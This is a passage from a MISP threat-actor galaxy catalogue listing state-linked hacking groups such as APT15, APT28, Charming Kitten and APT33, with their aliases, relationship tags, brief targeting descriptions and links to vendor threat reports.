https://www.ncsc.gov.uk/content/files/protected_files/article_files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf

https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf

https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

https://www.eweek.com/security/chinese-nation-state-hackers-target-u.s-in-operation-tradesecret

https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/

https://www.accenture.com/t20180423T055005Z_w/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf

https://www.us-cert.gov/sites/default/files/publications/IR-ALERT-MED-17-093-01C-Intrusions_Affecting_Multiple_Victims_Across_Multiple_Sectors.pdf

https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html

https://www.fbi.gov/news/stories/chinese-hackers-indicted-122018

https://attack.mitre.org/groups/G0045/

https://www.secureworks.com/research/threat-profiles/bronze-riverside

https://unit42.paloaltonetworks.com/atoms/granite-taurus

https://www.mandiant.com/resources/insights/apt-groups

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new

Hellsing

This threat actor uses spear-phishing techniques to compromise diplomatic targets in Southeast Asia, India, and the United States. It also seems to have targeted APT30. It possibly uses the same infrastructure as Mirage.

The tag is: misp-galaxy:threat-actor="Hellsing"

Table 11793. Table References

Links

https://www.cfr.org/interactive/cyber-operations/hellsing

https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/

Night Dragon

The tag is: misp-galaxy:threat-actor="Night Dragon"

Night Dragon is also known as:

  • G0014

Night Dragon has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Night Dragon - G0014" with estimative-language:likelihood-probability="likely"

Table 11794. Table References

Links

https://kc.mcafee.com/corporate/index?page=content&id=KB71150

https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf

https://attack.mitre.org/groups/G0014/

APT15

This threat actor uses phishing techniques to compromise the networks of foreign ministries of European countries for espionage purposes.

The tag is: misp-galaxy:threat-actor="APT15"

APT15 is also known as:

  • VIXEN PANDA

  • Ke3Chang

  • Playful Dragon

  • Metushy

  • Lurid

  • Social Network Team

  • Royal APT

  • BRONZE PALACE

  • BRONZE DAVENPORT

  • BRONZE IDLEWOOD

  • NICKEL

  • G0004

  • Red Vulture

  • Nylon Typhoon

APT15 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Nylon Typhoon" with estimative-language:likelihood-probability="likely"

Table 11795. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backdoor-now-on-os-x.html

http://arstechnica.com/security/2015/04/elite-cyber-crime-group-strikes-back-after-attack-by-rival-apt-gang/

https://github.com/nccgroup/Royal_APT

https://www.cfr.org/interactive/cyber-operations/mirage

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf

https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/

https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/

https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/

https://attack.mitre.org/groups/G0004/

https://www.secureworks.com/research/threat-profiles/bronze-palace

https://www.mandiant.com/resources/insights/apt-groups

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi

APT14

PLA Navy Anchor Panda is an adversary that CrowdStrike has tracked extensively over the last year targeting both civilian and military maritime operations in the green/brown water regions primarily in the area of operations of the South Sea Fleet of the PLA Navy. In addition to maritime operations in this region, Anchor Panda also heavily targeted western companies in the US, Germany, Sweden, the UK, and Australia, and other countries involved in maritime satellite systems, aerospace companies, and defense contractors. Not surprisingly, embassies and diplomatic missions in the region, foreign intelligence services, and foreign governments with space programs were also targeted.

The tag is: misp-galaxy:threat-actor="APT14"

APT14 is also known as:

  • ANCHOR PANDA

  • QAZTeam

  • ALUMINUM

APT14 has relationships with:

  • uses: misp-galaxy:rat="Gh0st RAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="Gh0st Rat" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:rat="PoisonIvy" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="Poison Ivy" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="Torn RAT" with estimative-language:likelihood-probability="likely"

Table 11796. Table References

Links

http://www.crowdstrike.com/blog/whois-anchor-panda/

https://www.cfr.org/interactive/cyber-operations/anchor-panda

https://www.mandiant.com/resources/insights/apt-groups

DAGGER PANDA

Operating since at least 2011, from several locations in China, with members in Korea and Japan as well. Possibly linked to Onion Dog. This threat actor targets government institutions, military contractors, maritime and shipbuilding groups, telecommunications operators, and others, primarily in Japan and South Korea.

The tag is: misp-galaxy:threat-actor="DAGGER PANDA"

DAGGER PANDA is also known as:

  • IceFog

  • Trident

  • RedFoxtrot

  • Red Wendigo

  • PLA Unit 69010

Table 11798. Table References

Links

https://securelist.com/the-icefog-apt-a-tale-of-cloak-and-three-daggers/57331/

https://securelist.com/the-icefog-apt-hits-us-targets-with-java-backdoor/58209/

https://www.cfr.org/interactive/cyber-operations/icefog

https://d2538mqrb7brka.cloudfront.net/wp-content/uploads/sites/43/2018/03/20133739/icefog.pdf

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf

APT24

The Pitty Tiger group has been active since at least 2011. It has been seen using the Heartbleed vulnerability to obtain valid credentials directly.

The tag is: misp-galaxy:threat-actor="APT24"

APT24 is also known as:

  • PITTY PANDA

  • G0011

  • Temp.Pittytiger

APT24 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="PittyTiger - G0011" with estimative-language:likelihood-probability="likely"

Table 11799. Table References

Links

http://blog.airbuscybersecurity.com/post/2014/07/The-Eye-of-the-Tiger2

http://blog.cassidiancybersecurity.com/post/2014/07/The-Eye-of-the-Tiger2

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/2014.07.11.Pitty_Tiger/Pitty_Tiger_Final_Report.pdf

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/

https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html

https://attack.mitre.org/groups/G0011

https://www.mandiant.com/resources/insights/apt-groups

Beijing Group

The tag is: misp-galaxy:threat-actor="Beijing Group"

Beijing Group is also known as:

  • SNEAKY PANDA

  • Elderwood

  • Elderwood Gang

  • SIG22

  • G0066

Beijing Group has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Elderwood - G0066" with estimative-language:likelihood-probability="likely"

Table 11801. Table References

Links

https://www.cfr.org/interactive/cyber-operations/sneaky-panda

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=3b0d679a-3707-4075-a2a9-37d1af16d411&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://attack.mitre.org/groups/G0066/

RADIO PANDA

The tag is: misp-galaxy:threat-actor="RADIO PANDA"

RADIO PANDA is also known as:

  • Shrouded Crossbow

SAMURAI PANDA

The tag is: misp-galaxy:threat-actor="SAMURAI PANDA"

SAMURAI PANDA is also known as:

  • PLA Navy

  • Wisp Team

SAMURAI PANDA has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT18 - G0026" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="APT18" with estimative-language:likelihood-probability="likely"

Table 11803. Table References

Links

http://www.crowdstrike.com/blog/whois-samurai-panda/

IMPERSONATING PANDA

The tag is: misp-galaxy:threat-actor="IMPERSONATING PANDA"

APT20

We’ve uncovered some new data and likely attribution regarding a series of APT watering hole attacks this past summer. Watering hole attacks are an increasingly popular component of APT campaigns, as many people are more aware of spear phishing and are less likely to open documents or click on links in unsolicited emails. Watering hole attacks offer a much better chance of success because they involve compromising legitimate websites and installing malware intended to compromise website visitors. These are often popular websites frequented by people who work in specific industries or have political sympathies to which the actors want to gain access. In contrast to many other APT campaigns, which tend to rely heavily on spear phishing to gain victims, “th3bug” is known for compromising legitimate websites their intended visitors are likely to frequent. Over the summer they compromised several sites, including a well-known Uyghur website written in that native language.

The tag is: misp-galaxy:threat-actor="APT20"

APT20 is also known as:

  • VIOLIN PANDA

  • TH3Bug

  • Crawling Taurus

Table 11804. Table References

Links

http://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/

https://www.fox-it.com/nl/actueel/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf

https://unit42.paloaltonetworks.com/atoms/crawling-taurus/

https://www.mandiant.com/resources/insights/apt-groups

TOXIC PANDA

A group targeting dissident groups in China and its border regions.

The tag is: misp-galaxy:threat-actor="TOXIC PANDA"

Table 11805. Table References

Links

https://docs.huihoo.com/rsaconference/usa-2014/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries-final.pdf

TEMPER PANDA

China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as PoisonIvy, as well as some non-public backdoors. This threat actor targets pro-democracy activists and organizations in Hong Kong, European and international financial institutions, and a U.S.-based think tank.

The tag is: misp-galaxy:threat-actor="TEMPER PANDA"

TEMPER PANDA is also known as:

  • Admin338

  • Team338

  • MAGNESIUM

  • admin@338

  • G0018

TEMPER PANDA has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="admin@338 - G0018" with estimative-language:likelihood-probability="likely"

Table 11806. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html

https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html

https://www.cfr.org/interactive/cyber-operations/admin338

https://attack.mitre.org/groups/G0018/

APT23

TrendMicro described Tropic Trooper in a 2015 report as: 'Taiwan and the Philippines have become the targets of an ongoing campaign called Operation TropicTrooper. Active since 2012, the attackers behind the campaign have set their sights on the Taiwanese government as well as a number of companies in the heavy industry. The same campaign has also targeted key Philippine military agencies.'

The tag is: misp-galaxy:threat-actor="APT23"

APT23 is also known as:

  • PIRATE PANDA

  • KeyBoy

  • Tropic Trooper

  • BRONZE HOBART

  • G0081

  • Red Orthrus

  • Earth Centaur

Table 11807. Table References

Links

https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/

http://www.crowdstrike.com/blog/rhetoric-foreshadows-cyber-activity-in-the-south-china-sea/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdf

https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/

https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/

https://blog.lookout.com/titan-mobile-threat

https://attack.mitre.org/groups/G0081/

https://www.secureworks.com/research/threat-profiles/bronze-hobart

https://www.mandiant.com/resources/insights/apt-groups

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html

Flying Kitten

Active against the defense and aerospace sectors; also interested in targeting entities in the oil and gas industry.

The tag is: misp-galaxy:threat-actor="Flying Kitten"

Flying Kitten is also known as:

  • SaffronRose

  • Saffron Rose

  • AjaxSecurityTeam

  • Ajax Security Team

  • Group 26

  • Sayad

Flying Kitten has relationships with:

  • similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="very-likely"

  • similar: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Cleaver - G0003" with estimative-language:likelihood-probability="likely"

Table 11808. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-operation-saffron-rose.pdf

https://www.crowdstrike.com/blog/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten/

https://www.cfr.org/interactive/cyber-operations/saffron-rose

Cutting Kitten

One of the threat actors responsible for the denial-of-service attacks against the U.S. in 2012–2013. Three individuals associated with the group, believed to have been working on behalf of Iran's Islamic Revolutionary Guard Corps, were indicted by the Justice Department in 2016.

The tag is: misp-galaxy:threat-actor="Cutting Kitten"

Cutting Kitten is also known as:

  • ITsecTeam

Table 11809. Table References

Links

https://www.cfr.org/interactive/cyber-operations/itsecteam

https://www.justice.gov/usao-sdny/file/835061/download

Charming Kitten

Charming Kitten (aka Parastoo, aka Newscaster) is a group with a suspected nexus to Iran that targets organizations involved in the government, defense technology, military, and diplomacy sectors.

The tag is: misp-galaxy:threat-actor="Charming Kitten"

Charming Kitten is also known as:

  • Newscaster

  • Parastoo

  • iKittens

  • Group 83

  • NewsBeef

  • G0058

  • CharmingCypress

Charming Kitten has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Cleaver - G0003" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Mint Sandstorm" with estimative-language:likelihood-probability="likely"

Table 11810. Table References

Links

https://en.wikipedia.org/wiki/Operation_Newscaster

https://iranthreats.github.io/resources/macdownloader-macos-malware/

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/2014.05.28.NewsCaster_An_Iranian_Threat_Within_Social_Networks/file-2581720763-pdf.pdf

https://www.forbes.com/sites/thomasbrewster/2017/07/27/iran-hackers-oilrig-use-fake-personas-on-facebook-linkedin-for-cyberespionage/

https://cryptome.org/2012/11/parastoo-hacks-iaea.htm

https://securelist.com/files/2017/03/Report_Shamoon_StoneDrill_final.pdf

https://securelist.com/blog/software/74503/freezer-paper-around-free-meat/

https://www.verfassungsschutz.de/download/broschuere-2016-10-bfv-cyber-brief-2016-04.pdf

https://www.cfr.org/interactive/cyber-operations/newscaster

https://www.washingtontimes.com/news/2014/may/29/iranian-hackers-sucker-punch-us-defense-heads-crea/

https://securelist.com/freezer-paper-around-free-meat/74503/

https://www.scmagazine.com/home/security-news/cybercrime/hbo-breach-accomplished-with-hard-work-by-hacker-poor-security-practices-by-victim/

http://www.arabnews.com/node/1195681/media

https://cyware.com/news/iranian-apt-charming-kitten-impersonates-clearsky-the-security-firm-that-uncovered-its-campaigns-7fea0b4f

https://blog.certfa.com/posts/the-return-of-the-charming-kitten/

https://www.justice.gov/opa/pr/former-us-counterintelligence-agent-charged-espionage-behalf-iran-four-iranians-charged-cyber

https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/

https://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf

https://attack.mitre.org/groups/G0058/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/

APT33

Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013. We assess APT33 works at the behest of the Iranian government.

The tag is: misp-galaxy:threat-actor="APT33"

APT33 is also known as:

  • APT 33

  • Elfin

  • MAGNALLIUM

  • Refined Kitten

  • HOLMIUM

  • COBALT TRINITY

  • G0064

  • ATK35

  • Peach Sandstorm

  • TA451

APT33 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT33 - G0064" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Peach Sandstorm" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-ics-groups="APT33" with estimative-language:likelihood-probability="almost-certain"

Table 11811. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

https://blog.trendmicro.com/trendlabs-security-intelligence/more-than-a-dozen-obfuscated-apt33-botnets-used-for-extreme-narrow-targeting/

https://www.brighttalk.com/webcast/10703/275683

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage

https://www.secureworks.com/research/threat-profiles/cobalt-trinity

https://attack.mitre.org/groups/G0064/

https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/

https://www.cfr.org/interactive/cyber-operations/apt-33

https://dragos.com/media/2017-Review-Industrial-Control-System-Threats.pdf

https://dragos.com/adversaries.html

https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/

Magic Kitten

Earliest activity dates back to November 2008. An established group of cyber attackers based in Iran, who carried out several campaigns in 2013, including a series of attacks targeting political dissidents and those supporting Iranian political opposition.

The tag is: misp-galaxy:threat-actor="Magic Kitten"

Magic Kitten is also known as:

  • Group 42

  • VOYEUR

Table 11812. Table References

Links

https://web.archive.org/web/20161020180305/http://www.scmagazineuk.com/iran-and-russia-blamed-for-state-sponsored-espionage/article/330401/

https://carnegieendowment.org/2018/01/04/iran-s-cyber-ecosystem-who-are-threat-actors-pub-75140

Rocket Kitten

Targets Saudi Arabia, Israel, the US and Iran: high-ranking defense officials, embassies of various target countries, notable Iran researchers, human rights activists, media and journalists, academic institutions and various scholars, including scientists in the fields of physics and nuclear sciences.

The tag is: misp-galaxy:threat-actor="Rocket Kitten"

Rocket Kitten is also known as:

  • TEMP.Beanie

  • Operation Woolen Goldfish

  • Operation Woolen-Goldfish

  • Thamar Reservoir

  • Timberworm

Rocket Kitten has relationships with:

  • similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="very-likely"

  • similar: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Cleaver - G0003" with estimative-language:likelihood-probability="likely"

Table 11813. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-woolen-goldfish-when-kittens-go-phishing

https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-the-spy-kittens-are-back.pdf

http://www.clearskysec.com/thamar-reservoir/

https://citizenlab.ca/2015/08/iran_two_factor_phishing/

https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/

https://en.wikipedia.org/wiki/Rocket_Kitten

https://www.cfr.org/interactive/cyber-operations/rocket-kitten

Cleaver

A group of cyber actors utilizing infrastructure located in Iran have been conducting computer network exploitation activity against public and private U.S. organizations, including Cleared Defense Contractors (CDCs), academic institutions, and energy sector companies. This threat actor targets entities in the government, energy, and technology sectors that are located in or do business with Saudi Arabia.

The tag is: misp-galaxy:threat-actor="Cleaver"

Cleaver is also known as:

  • Operation Cleaver

  • Op Cleaver

  • Tarh Andishan

  • Alibaba

  • TG-2889

  • Cobalt Gypsy

  • G0003

Cleaver has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Cleaver - G0003" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cutting Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Hazel Sandstorm" with estimative-language:likelihood-probability="likely"

Table 11814. Table References

Links

https://www.secureworks.com/research/the-curious-case-of-mia-ash

https://www.cfr.org/interactive/cyber-operations/operation-cleaver

http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-woolen-goldfish-when-kittens-go-phishing

https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations

https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-the-spy-kittens-are-back.pdf

https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf

https://attack.mitre.org/groups/G0003/

https://xorl.wordpress.com/2021/05/06/iran-cyber-operations-groups/

https://www.secureworks.com/research/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles

https://know.netenrich.com/threatintel/threat_actor/Cutting%20Kitten

https://www.cfr.org/cyber-operations/operation-cleaver

https://securityaffairs.co/wordpress/33682/cyber-crime/ali-baba-apt-middle-east.html

https://scadahacker.com/library/Documents/Cyber_Events/Cylance%20-%20Operation%20Cleaver%20Report.pdf

Sands Casino

The tag is: misp-galaxy:threat-actor="Sands Casino"

Rebel Jackal

This is a pro-Islamist organization that generally conducts attacks motivated by real-world events in which its members believe that members of the Muslim faith were wronged. Its attacks generally involve website defacements; however, the group did develop a RAT that it refers to as Fallaga RAT, which appears to simply be a fork of the njRAT malware popular among hackers in the Middle East/North Africa region.

The tag is: misp-galaxy:threat-actor="Rebel Jackal"

Rebel Jackal is also known as:

  • FallagaTeam

Viking Jackal

The tag is: misp-galaxy:threat-actor="Viking Jackal"

Viking Jackal is also known as:

  • Vikingdom

APT28

The Sofacy Group (also known as APT28, Pawn Storm, Fancy Bear and Sednit) is a cyber espionage group believed to have ties to the Russian government. Likely operating since 2007, the group is known to target government, military, and security organizations. It has been characterized as an advanced persistent threat.

The tag is: misp-galaxy:threat-actor="APT28"

APT28 is also known as:

  • Pawn Storm

  • FANCY BEAR

  • Sednit

  • SNAKEMACKEREL

  • Tsar Team

  • TG-4127

  • STRONTIUM

  • Swallowtail

  • IRON TWILIGHT

  • Group 74

  • SIG40

  • Grizzly Steppe

  • G0007

  • ATK5

  • Fighting Ursa

  • ITG05

  • Blue Athena

  • TA422

  • T-APT-12

  • APT-C-20

  • UAC-0028

  • FROZENLAKE

  • Sofacy

  • Forest Blizzard

APT28 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT28 - G0007" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="STRONTIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Forest Blizzard" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="奇幻熊 - APT-C-20" with estimative-language:likelihood-probability="likely"

Table 11815. Table References

Links

https://attack.mitre.org/groups/G0007/

https://en.wikipedia.org/wiki/Fancy_Bear

https://en.wikipedia.org/wiki/Sofacy_Group

https://www.bbc.com/news/technology-37590375

https://www.bbc.co.uk/news/technology-45257081

https://www.cfr.org/interactive/cyber-operations/apt-28

https://www.apnews.com/4d174e45ef5843a0ba82e804f080988f

https://www.voanews.com/a/iaaf-hack-fancy-bears/3793874.html

https://securelist.com/a-slice-of-2017-sofacy-activity/83930/

https://www.dw.com/en/hackers-lurking-parliamentarians-told/a-19564630

https://unit42.paloaltonetworks.com/unit42-sofacys-komplex-os-x-trojan/

https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/

https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html

https://www2.fireeye.com/rs/848-DID-242/images/wp-mandiant-matryoshka-mining.pdf

https://www.eff.org/deeplinks/2015/08/new-spear-phishing-campaign-pretends-be-eff

https://aptnotes.malwareconfig.com/web/viewer.html?file=../APTnotes/2014/apt28.pdf

https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware

https://www.wired.com/story/russian-fancy-bears-hackers-release-apparent-ioc-emails/

https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

https://unit42.paloaltonetworks.com/unit42-sofacy-attacks-multiple-government-entities/

https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/

https://www.msn.com/en-nz/news/world/russian-hackers-accused-of-targeting-un-chemical-weapons-watchdog-mh17-files/ar-BBNV2ny

https://unit42.paloaltonetworks.com/unit42-new-sofacy-attacks-against-us-government-agency/

https://unit42.paloaltonetworks.com/unit42-let-ride-sofacy-groups-dealerschoice-attacks-continue/

https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/

https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/

https://www.bleepingcomputer.com/news/security/apt28-uses-lojax-first-uefi-rootkit-seen-in-the-wild/

https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-targets-mh17-investigation-team/

https://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/

https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf

https://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/

https://blogs.microsoft.com/on-the-issues/2018/08/20/we-are-taking-new-steps-against-broadening-threats-to-democracy/

https://www.lse.co.uk/AllNews.asp?code=kwdwehme&headline=Russian_Hackers_Suspected_In_Cyberattack_On_German_Parliament

https://www.volkskrant.nl/cultuur-media/russen-faalden-bij-hackpogingen-ambtenaren-op-nederlandse-ministeriesb77ff391/

https://www.ibtimes.co.uk/russian-hackers-fancy-bear-likely-breached-olympic-drug-testing-agency-dnc-experts-say-1577508

https://www.bleepingcomputer.com/news/security/microsoft-disrupts-apt28-hacking-campaign-aimed-at-us-midterm-elections/

https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected

https://www.accenture.com/t20181129T203820Zw/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf

https://www.reuters.com/article/us-sweden-doping/swedish-sports-body-says-anti-doping-unit-hit-by-hacking-attack-idUSKCN1IG2GN

https://researchcenter.paloaltonetworks.com/2016/10/unit42-dealerschoice-sofacys-flash-player-exploit-platform/

https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/

https://www.washingtonpost.com/technology/2019/02/20/microsoft-says-it-has-found-another-russian-operation-targeting-prominent-think-tanks/?utm_term=.870ff11468ae

https://www.handelsblatt.com/today/politics/election-risks-russia-linked-hackers-target-german-political-foundations/23569188.html?ticket=ST-2696734-GRHgtQukDIEXeSOwksXO-ap1

